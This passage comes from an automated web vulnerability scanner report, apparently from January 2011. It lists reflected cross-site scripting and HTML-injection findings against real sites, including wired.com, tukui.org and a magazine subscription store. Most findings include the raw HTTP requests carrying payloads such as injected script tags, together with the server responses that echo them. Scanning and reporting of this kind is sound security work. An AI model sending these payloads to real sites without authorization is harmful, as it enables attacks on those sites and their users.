       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "bf9ef--><a b=c>c4c591cd110".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.48. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Vogue [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Vogue

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 9b1a1--><a%20b%3dc>0ebbfb1070a was submitted in the REST URL parameter 5. This input was echoed as 9b1a1--><a b=c>0ebbfb1070a in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/9b1a1--><a%20b%3dc>0ebbfb1070a HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:52:55 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000ogGL_3HzphLpUVCIwzJaeWD:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:01:35 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "9b1a1--><a b=c>0ebbfb1070a".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.49. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_W [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_W

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 7fa15--><a%20b%3dc>8fe29995466 was submitted in the REST URL parameter 5. This input was echoed as 7fa15--><a b=c>8fe29995466 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/7fa15--><a%20b%3dc>8fe29995466 HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:25 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=00005RC3xkXmCObYY2VxnCFp0qy:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:02:17 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "7fa15--><a b=c>8fe29995466".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.50. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Wired [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Wired

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload 299a8--><a%20b%3dc>3a0d0c4b00f was submitted in the REST URL parameter 5. This input was echoed as 299a8--><a b=c>3a0d0c4b00f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /webapp/wcs/stores/servlet/299a8--><a%20b%3dc>3a0d0c4b00f HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:53:47 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000_Hl8m1yp5arMOjQMe96LPg3:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 05:02:39 GMT; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Language: en-US
Content-Length: 2329


                                               <!-- JSP File Name: SharedStoresTemplate/GenericError.jsp -->

<!DOCTYPE h
...[SNIP]...
re Commerce system, and check the log file.
       Exception Type:0
       Message Key:_ERR_CMD_CMD_NOT_FOUND
       Message:CMN3101E The system is unavailable due to "CMN0203E".
       System Message:Command not found: "299a8--><a b=c>3a0d0c4b00f".
       Corrective Action:
               
       
                       //*-------------------------------------------------------------------
       //********************************************************************
       -->
...[SNIP]...

3.51. http://www.tukui.org/v2/blog/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tukui.org
Path:   /v2/blog/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6e206'><script>alert(1)</script>589ffe6106c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6e206\'><script>alert(1)</script>589ffe6106c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/blog/?6e206'><script>alert(1)</script>589ffe6106c=1 HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:58:50 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25840

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href='http://www.tukui.org/v2/blog/page/2/?6e206\'><script>alert(1)</script>589ffe6106c=1' class='inactive' >
...[SNIP]...

3.52. http://www.tukui.org/v2/category/others/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tukui.org
Path:   /v2/category/others/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 4fcd2'><script>alert(1)</script>291a5ab83dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4fcd2\'><script>alert(1)</script>291a5ab83dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v2/category/others/?4fcd2'><script>alert(1)</script>291a5ab83dd=1 HTTP/1.1
Host: www.tukui.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 14:59:11 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
X-Pingback: http://www.tukui.org/v2/xmlrpc.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 25721

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head profile="http://gmpg.org/xfn/11">
<meta
...[SNIP]...
<a href='http://www.tukui.org/v2/category/others/page/2/?4fcd2\'><script>alert(1)</script>291a5ab83dd=1' class='inactive' >
...[SNIP]...

3.53. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 205d9"><a>249a37450e2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax205d9"><a>249a37450e2/widgets/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:06 GMT
Date: Wed, 12 Jan 2011 12:59:06 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax205d9"><a>249a37450e2 ss_widgets c_related">
...[SNIP]...

3.54. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 26766"><a>ac7204c3476 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets26766"><a>ac7204c3476/related/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 13:03:11 GMT
Date: Wed, 12 Jan 2011 12:59:11 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets26766"><a>ac7204c3476 c_related">
...[SNIP]...

3.55. http://www.wired.com/ajax/widgets/related/content/blogPost/threatlevel_22564 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /ajax/widgets/related/content/blogPost/threatlevel_22564

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 892c1"><a>b717fa44b47 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ajax/widgets/related892c1"><a>b717fa44b47/content/blogPost/threatlevel_22564 HTTP/1.1
Host: www.wired.com
Proxy-Connection: keep-alive
Referer: http://www.wired.com/threatlevel/2011/01/wikileaks-sunken-treasure/
X-Requested-With: XMLHttpRequest
Accept: text/html, */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mobify=0

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28674
Vary: Accept-Encoding
Cache-Control: max-age=223
Expires: Wed, 12 Jan 2011 13:03:00 GMT
Date: Wed, 12 Jan 2011 12:59:17 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_ajax ss_widgets c_related892c1"><a>b717fa44b47">
...[SNIP]...

3.56. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84fc9"><a>2661fde8d90 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services84fc9"><a>2661fde8d90/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:09:56 GMT
Date: Wed, 12 Jan 2011 05:05:56 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services84fc9"><a>2661fde8d90 ss_dart c_init">
...[SNIP]...

3.57. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 1ea2a--><script>alert(1)</script>e16b1ceae38 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Cache-Control: max-age=240
Expires: Wed, 12 Jan 2011 05:11:43 GMT
Date: Wed, 12 Jan 2011 05:07:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services1ea2a--><script>alert(1)</script>e16b1ceae38/dart/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.58. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into an HTML comment. The payload afcbe--><script>alert(1)</script>6fa95a9452b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28703
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:09:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:09:39 GMT
Connection: close
Set-Cookie: JSESSIONID=cabZwTKl-2_Lv4oyrO41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services/dartafcbe--><script>alert(1)</script>6fa95a9452b/init/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.59. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94545"><a>aa0843de90d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart94545"><a>aa0843de90d/init/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Expires: Wed, 12 Jan 2011 05:07:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 05:07:52 GMT
Connection: close
Set-Cookie: JSESSIONID=cabTzf5URbO2QfkB3N41s; path=/


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart94545"><a>aa0843de90d c_init">
...[SNIP]...

3.60. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e526"><a>ca37ef5da9c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /services/dart/init3e526"><a>ca37ef5da9c/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28662
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:19:47 GMT
Date: Wed, 12 Jan 2011 05:09:47 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_services ss_dart c_init3e526"><a>ca37ef5da9c">
...[SNIP]...

3.61. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 70510--><script>alert(1)</script>b4ecd010e4e was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 28689
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Wed, 12 Jan 2011 05:21:23 GMT
Date: Wed, 12 Jan 2011 05:11:23 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<!--
Exception message: URL not found: /services/dart/init70510--><script>alert(1)</script>b4ecd010e4e/threatlevel/kw=threatlevel
-->
...[SNIP]...

3.62. http://www.wired.com/services/dart/init/threatlevel/kw=threatlevel [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wired.com
Path:   /services/dart/init/threatlevel/kw=threatlevel

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 6bfc8<script>alert(1)</script>41b5de530a5 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /services/dart/init/threatlevel/kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 200 OK
Server: Apache/2.0.52 (Red Hat)
Content-Language: en-US
Content-Type: text/javascript; charset=UTF-8
Content-Length: 249
Cache-Control: private, max-age=600
Expires: Wed, 12 Jan 2011 05:21:56 GMT
Date: Wed, 12 Jan 2011 05:11:56 GMT
Connection: close


CN.dart.init({site:'wiredcom.dart', zone: 'threatlevel;', kws:[ "kw6bfc8<script>alert(1)</script>41b5de530a5=threatlevel"], charmap : {' ' : '+', '-' : '_'}});



3.63. http://www.wired.com/user/login [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.wired.com
Path:   /user/login

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6e6e4"><a>5dd758f037d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /user6e6e4"><a>5dd758f037d/login HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=238032518.1294610301.1.1.utmccn=(referral)|utmcsr=packetstormsecurity.org|utmcct=/news/view/18429/WikiLeaks-Cables-Cited-In-Lawsuit-Over-500-Million-Sunken-Treasure.html|utmcmd=referral; s_sq=%5B%5BB%5D%5D; s_nr=1294610300989; __utma=238032518.191268759.1294610294.1294610294.1294610294.1; mobify=0; __utmc=238032518; __utmb=238032518;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
